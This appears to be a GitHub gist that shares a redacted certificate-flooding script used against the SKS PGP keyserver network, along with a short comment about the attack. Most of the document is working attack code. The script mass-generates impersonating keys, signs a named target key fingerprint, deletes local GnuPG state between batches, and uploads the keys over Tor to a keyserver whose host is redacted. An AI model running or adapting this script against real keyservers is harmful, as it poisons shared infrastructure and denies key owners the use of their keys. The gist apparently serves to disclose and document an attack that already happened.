Skip to content

Instantly share code, notes, and snippets.

@lukateras

lukateras/fill_the_pool.sh

Last active December 13, 2020 16:38
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save lukateras/8d57c7892d4bcd50d11e69f71b1f80bf to your computer and use it in GitHub Desktop.
Save lukateras/8d57c7892d4bcd50d11e69f71b1f80bf to your computer and use it in GitHub Desktop.
Download ZIP
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
Raw
fill_the_pool.sh
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
done
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
rm ~/.gnupg/pub*
rm ~/.gnupg/tofu.db
rm ~/.gnupg/trustdb.gpg
rm -r ~/.gnupg/openpgp-revocs.d
rm -r ~/.gnupg/private-keys-v1.d
mkdir ~/.gnupg/private-keys-v1.d
gpg --import ~/Desktop/yt.asc
curl \
--socks5-hostname localhost:9050 \
--data-urlencode "keytext@keyblock.asc" \
--max-time 60 \
example.com:11371/pks/add
rm ~/Desktop/keyblock.asc
done
Raw
keygen
Key-Type: default
Subkey-Type: default
Name-Real: Marc Horowitz
Name-Comment: Yegor, you did a great SKS research job so far! Hope you are well! May the best team win! :-)
Name-Email: marc@mit.edu
Expire-Date: 0
%no-protection
%commit
@lambdafu
Copy link

lambdafu commented Jul 5, 2019

It seems the main difficulty in this attack is preventing GnuPG from DoS'ing itself, so the home directory has to be purged frequently. Thanks for sharing this, it illustrates that no sophisticated tool like trollwot was necessary for the attack.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment